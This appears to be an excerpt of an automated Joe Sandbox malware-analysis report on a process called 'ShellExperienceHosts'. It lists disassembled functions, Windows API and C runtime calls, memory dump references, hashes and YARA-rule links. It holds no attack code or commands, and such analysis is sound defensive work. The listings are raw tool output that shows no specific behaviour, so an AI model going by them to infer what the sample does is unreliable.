                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Item
                                                                            • String ID:
                                                                            • API String ID: 369458955-0
                                                                            • Opcode ID: 44b50668a87eea2bcb91c14d4f1770932124a5e1805bacf49b6c49d2f96c2372
                                                                            • Instruction ID: bb5ed0d29c53e5c4c22a08836175dd7bff11e378749b3712fd1235c3cd2f0c6a
                                                                            • Opcode Fuzzy Hash: 44b50668a87eea2bcb91c14d4f1770932124a5e1805bacf49b6c49d2f96c2372
                                                                            • Instruction Fuzzy Hash: 0101443111163AABDF233F618E09A8E3E746F067AAF045331FD1895512D731D51196D5
                                                                            Function 10003660 Relevance: 6.0, APIs: 4, Instructions: 42timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 10003667
                                                                            • _free.LIBCMT ref: 1000369C
                                                                              • Part of subcall function 10006E49: HeapFree.KERNEL32(00000000,00000000,?,10009900,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F), ref: 10006E5F
                                                                              • Part of subcall function 10006E49: GetLastError.KERNEL32(00000000,?,10009900,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000), ref: 10006E71
                                                                            • _malloc.LIBCMT ref: 100036D7
                                                                            • _memset.LIBCMT ref: 100036E5
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CreateErrorFreeHeapLastTimerWaitable_free_malloc_memset
                                                                            • String ID:
                                                                            • API String ID: 3340475617-0
                                                                            • Opcode ID: 391cc94a781e731dd4c35f2c6748f9c6c817e77f81a08f70d75bdfa6bee01c3e
                                                                            • Instruction ID: 20f9dc9dccf48a4f32705b4407c0702e844904f7cd1830b54ea69625ce22a711
                                                                            • Opcode Fuzzy Hash: 391cc94a781e731dd4c35f2c6748f9c6c817e77f81a08f70d75bdfa6bee01c3e
                                                                            • Instruction Fuzzy Hash: 8401DEF5900B44DFE360CF7AD881B97B7E9EB45254F11882EE5AE87302DA31A8048F60
                                                                            Function 02236EEE Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _malloc.LIBCMT ref: 02236F08
                                                                              • Part of subcall function 02236E5A: __FF_MSGBANNER.LIBCMT ref: 02236E73
                                                                              • Part of subcall function 02236E5A: __NMSG_WRITE.LIBCMT ref: 02236E7A
                                                                              • Part of subcall function 02236E5A: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 02236E9F
                                                                            • std::exception::exception.LIBCMT ref: 02236F3D
                                                                            • std::exception::exception.LIBCMT ref: 02236F57
                                                                            • __CxxThrowException@8.LIBCMT ref: 02236F68
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                            • String ID:
                                                                            • API String ID: 615853336-0
                                                                            • Opcode ID: 1e9301e5085f9c58ec7a0ab4f7fc891bb570a668ba91a7db57855d99bd873ef8
                                                                            • Instruction ID: c516d3bf2079a1268f5e608258b8706b644764114a1874fba459e62a64bf6dee
                                                                            • Opcode Fuzzy Hash: 1e9301e5085f9c58ec7a0ab4f7fc891bb570a668ba91a7db57855d99bd873ef8
                                                                            • Instruction Fuzzy Hash: D9F0F4B142435ABADB02EBE4CC84ABD7AFEEB41704F140018E415DE0D5DFB1CAC18B59
                                                                            Function 031AF0C6 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _malloc.LIBCMT ref: 031AF0E0
                                                                              • Part of subcall function 031AF032: __FF_MSGBANNER.LIBCMT ref: 031AF04B
                                                                              • Part of subcall function 031AF032: __NMSG_WRITE.LIBCMT ref: 031AF052
                                                                            • std::exception::exception.LIBCMT ref: 031AF115
                                                                            • std::exception::exception.LIBCMT ref: 031AF12F
                                                                            • __CxxThrowException@8.LIBCMT ref: 031AF140
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543398477.00000000031A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_31a0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: std::exception::exception$Exception@8Throw_malloc
                                                                            • String ID:
                                                                            • API String ID: 2388904642-0
                                                                            • Opcode ID: b08fdf8cb5e3b65abb6e8e2bd981c9ae2de8ac343fbf2f6e0fd6789c4a68690e
                                                                            • Instruction ID: 1500ca657afc4ab309297e87af964cefbb58dfd7ef8083f57b4c3828dca12f01
                                                                            • Opcode Fuzzy Hash: b08fdf8cb5e3b65abb6e8e2bd981c9ae2de8ac343fbf2f6e0fd6789c4a68690e
                                                                            • Instruction Fuzzy Hash: 58F0F47D800B18ABDB15EB58DD64ABF7AAAEB48645F944068D800AA0D0DB718A03CB51
                                                                            Function 6C770D49 Relevance: 6.0, APIs: 4, Instructions: 41windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Parent$Focus
                                                                            • String ID:
                                                                            • API String ID: 384096180-0
                                                                            • Opcode ID: e4ad6d1a11dffea391c0cdd722ceff751e17d240f0b93b4bb54b90981a4b4abb
                                                                            • Instruction ID: a792bcfb1050071e948125a0eeeadd42f7159b47f073796302f907fad942e0ab
                                                                            • Opcode Fuzzy Hash: e4ad6d1a11dffea391c0cdd722ceff751e17d240f0b93b4bb54b90981a4b4abb
                                                                            • Instruction Fuzzy Hash: ECF062726003156BCF212B74CA0C96A76BABF8521531509BEF55BD7A21EF31A8008790
                                                                            Function 10006490 Relevance: 6.0, APIs: 4, Instructions: 36memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 10001420: HeapFree.KERNEL32(?,00000000,?,?,?,100040B1,?,00000000,10004039,?,74DEDFA0,10003648), ref: 1000143D
                                                                              • Part of subcall function 10001420: _free.LIBCMT ref: 10001459
                                                                            • HeapDestroy.KERNEL32(00000000), ref: 100064A3
                                                                            • HeapCreate.KERNEL32(?,?,?), ref: 100064B5
                                                                            • _free.LIBCMT ref: 100064C5
                                                                            • HeapDestroy.KERNEL32 ref: 100064F2
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$Destroy_free$CreateFree
                                                                            • String ID:
                                                                            • API String ID: 4097506873-0
                                                                            • Opcode ID: 93927da24fa2970c59e2ba275e76658273f805c74c1ab82e82c9513be7b43463
                                                                            • Instruction ID: e941b2b67b7b789b38fb12685925c4a960f3707d906db07a4445c0daadc26747
                                                                            • Opcode Fuzzy Hash: 93927da24fa2970c59e2ba275e76658273f805c74c1ab82e82c9513be7b43463
                                                                            • Instruction Fuzzy Hash: 28F032B9600702ABE710CF65D848B53B7FAFF88791F218528E86987244DB35F851CBA0
                                                                            Function 6C874A89 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,6C873A70,00000000,00000001,00000000,00000000,?,6C86C5A6,00000000,00000000,00000000), ref: 6C874AA0
                                                                            • GetLastError.KERNEL32 ref: 6C874AAC
                                                                              • Part of subcall function 6C874AFD: CloseHandle.KERNEL32(FFFFFFFE,6C874ABC), ref: 6C874B0D
                                                                            • ___initconout.LIBCMT ref: 6C874ABC
                                                                              • Part of subcall function 6C874ADE: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6C874A7A,6C873A5D,00000000,?,6C86C5A6,00000000,00000000,00000000,00000000), ref: 6C874AF1
                                                                            • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 6C874AD1
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                            • String ID:
                                                                            • API String ID: 2744216297-0
                                                                            • Opcode ID: 98aaa1eee7419997c440d0cbda2bb229a5f0c2841f9bdaaf81d692094072189f
                                                                            • Instruction ID: 39cd0a6c16f3b8d17dc8407a59e7bdbc7efae572cbb494ea977532574e8eead9
                                                                            • Opcode Fuzzy Hash: 98aaa1eee7419997c440d0cbda2bb229a5f0c2841f9bdaaf81d692094072189f
                                                                            • Instruction Fuzzy Hash: 2EF01236504129BBCF722FD5CC0898D7F36FB8A3A9B054830F919A5654DA32D920EFE5
                                                                            Function 031A980F Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 302COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _malloc.LIBCMT ref: 031A997F
                                                                              • Part of subcall function 031AF032: __FF_MSGBANNER.LIBCMT ref: 031AF04B
                                                                              • Part of subcall function 031AF032: __NMSG_WRITE.LIBCMT ref: 031AF052
                                                                            • _memcpy_s.LIBCMT ref: 031A9B42
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543398477.00000000031A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_31a0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: _malloc_memcpy_s
                                                                            • String ID: &
                                                                            • API String ID: 3561290194-3042966939
                                                                            • Opcode ID: c8a5b5b6493a3e00500570122ab972c2785b00225f4301cae1c49e60748ae0d9
                                                                            • Instruction ID: b718b1c4408bf531987633cebf8dcab1fa5932392429aa5ba96e6a0c6164cf6f
                                                                            • Opcode Fuzzy Hash: c8a5b5b6493a3e00500570122ab972c2785b00225f4301cae1c49e60748ae0d9
                                                                            • Instruction Fuzzy Hash: EFC141F5A00A199BDB24CF59CCC0BAAB7B8EB4C301F1485A9D609A7241D774AAC5CF64
                                                                            Function 6C70E846 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 163COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C70E84D
                                                                            • SetRectEmpty.USER32(0000E831), ref: 6C70E88D
                                                                              • Part of subcall function 6C7708FD: GetWindowLongW.USER32(?,000000F0), ref: 6C77090A
                                                                              • Part of subcall function 6C73913E: GetParent.USER32(?), ref: 6C73916A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: EmptyH_prolog3_LongParentRectWindow
                                                                            • String ID: Afx:StatusBar
                                                                            • API String ID: 531733666-3033333705
                                                                            • Opcode ID: b55ee4d49e29ff444a18d4f68b17300ed2d3e75a26e10599f0578ea8453adcb6
                                                                            • Instruction ID: 97317616772e1b6ea8995ef281b43f4c1503b6256965bac10d270dd091f694e2
                                                                            • Opcode Fuzzy Hash: b55ee4d49e29ff444a18d4f68b17300ed2d3e75a26e10599f0578ea8453adcb6
                                                                            • Instruction Fuzzy Hash: 8D4116B170522957DF289B798F4DABE25A9BF4B358B100625B851B7FC0DF20D80583F1
                                                                            Function 6C6F4BDA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowRect.USER32(?,?), ref: 6C6F4C41
                                                                            • SystemParametersInfoW.USER32(00000026,00000000,?,00000000), ref: 6C6F4CF3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: InfoParametersRectSystemWindow
                                                                            • String ID:
                                                                            • API String ID: 85510744-3916222277
                                                                            • Opcode ID: f7a5bc2de09cc05c29c1779a673fc855e278dce3fc21a36a4af239f408584646
                                                                            • Instruction ID: fc2cef9bd1b010c808b937a516f753a19568ccf4218cb6d93b13a272fc93c557
                                                                            • Opcode Fuzzy Hash: f7a5bc2de09cc05c29c1779a673fc855e278dce3fc21a36a4af239f408584646
                                                                            • Instruction Fuzzy Hash: 37518971A00218DFDF058F64C988AEE7BB2FF89314F144179EC1AAB655CB709945CFA4
                                                                            Function 031AC2CF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543398477.00000000031A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_31a0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: _memset_wcsrchr
                                                                            • String ID: D
                                                                            • API String ID: 1675014779-2746444292
                                                                            • Opcode ID: 9448fe74a29e6cb94ba3ba7ffaf0542041cc64757f3c043286b2e5ea21082185
                                                                            • Instruction ID: 24ce5e86c16466883d0216a65f8dc931b2e5ab348816f9ddf0091d826a2955bc
                                                                            • Opcode Fuzzy Hash: 9448fe74a29e6cb94ba3ba7ffaf0542041cc64757f3c043286b2e5ea21082185
                                                                            • Instruction Fuzzy Hash: F731F4B6A403187BE720D7A49C89FEB776CEB48711F140125FA0AAA1C0DB759A06C6E5
                                                                            Function 6C7C2EEA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C7C2EF1
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,0000007C,0000007D,00000001,?,?,00000008,6C737FF5,?,0000E831,00000000,00000004,6C74A4A1,00000002), ref: 6C7C303C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: H_prolog3QueryValue
                                                                            • String ID: SOFTWARE\
                                                                            • API String ID: 2373586757-3302998844
                                                                            • Opcode ID: 709018c633d00bff9d54ed7fd8905215e7e9a21092a236edabc0b287f8a98f90
                                                                            • Instruction ID: 5399fbda838664322ef34790961a12ceb216b1b782ee47e372c242d5dc6a03bd
                                                                            • Opcode Fuzzy Hash: 709018c633d00bff9d54ed7fd8905215e7e9a21092a236edabc0b287f8a98f90
                                                                            • Instruction Fuzzy Hash: 31310231701205AFDB149F65CA88EFE776AAF44708F10442AF8105BFA2CB34CD48DBA6
                                                                            Function 6C6E4AF4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 6C6E4BB8
                                                                            • PathFindExtensionW.SHLWAPI(?,?), ref: 6C6E4BCE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ExtensionFileFindModuleNamePath
                                                                            • String ID: %Ts%Ts.dll
                                                                            • API String ID: 2295281026-1896370695
                                                                            • Opcode ID: d75e7ba6eaffcfd2d11c610c3096e0ab7468ff5f6589ebc46b3ee5300674410a
                                                                            • Instruction ID: 5798653099e6212fe223acef607565871d7a98ef9a8feb61ed11308002ba059a
                                                                            • Opcode Fuzzy Hash: d75e7ba6eaffcfd2d11c610c3096e0ab7468ff5f6589ebc46b3ee5300674410a
                                                                            • Instruction Fuzzy Hash: CD31F731706115ABCB11AAB8D988AFBB7ACAF4D318B150167F415D7A40DBA0E805C7D4
                                                                            Function 6C862B05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 6C862D7C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ___except_validate_context_record
                                                                            • String ID: csm$csm
                                                                            • API String ID: 3493665558-3733052814
                                                                            • Opcode ID: 6ad89dd06cec5040c114d10119546ecb84d4f4c2c219eeb3924d00ec0a79cacb
                                                                            • Instruction ID: a855100a71cabf50ee68dcf3d173112205b4486daba49d593fc307e2451b1e28
                                                                            • Opcode Fuzzy Hash: 6ad89dd06cec5040c114d10119546ecb84d4f4c2c219eeb3924d00ec0a79cacb
                                                                            • Instruction Fuzzy Hash: 62310876500208ABCF324F56CE4899A3B65FF05759B1849E9FC140DD12C33BD861CB81
                                                                            Function 6C6C4C80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6C6C4CB5
                                                                              • Part of subcall function 6C6C12E2: std::_Lockit::_Lockit.LIBCPMT ref: 6C6C142F
                                                                              • Part of subcall function 6C6C12E2: std::_Lockit::~_Lockit.LIBCPMT ref: 6C6C144A
                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6C6C4D27
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                            • String ID: sJll
                                                                            • API String ID: 593203224-2827997600
                                                                            • Opcode ID: 2765d93277fd8e851c05994372c5a54092252c06d0f1d8006a586f2579d92ad3
                                                                            • Instruction ID: 54b2e4c23c78f367f1af70513600a8cd65bf4e7fc7c52d387b99d6afa42816e7
                                                                            • Opcode Fuzzy Hash: 2765d93277fd8e851c05994372c5a54092252c06d0f1d8006a586f2579d92ad3
                                                                            • Instruction Fuzzy Hash: E22191B1E002088FCB10DFA8D944AEDB7F4FF09718F104569E819A7790E735A944CBA5
                                                                            Function 6C6B2BFC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
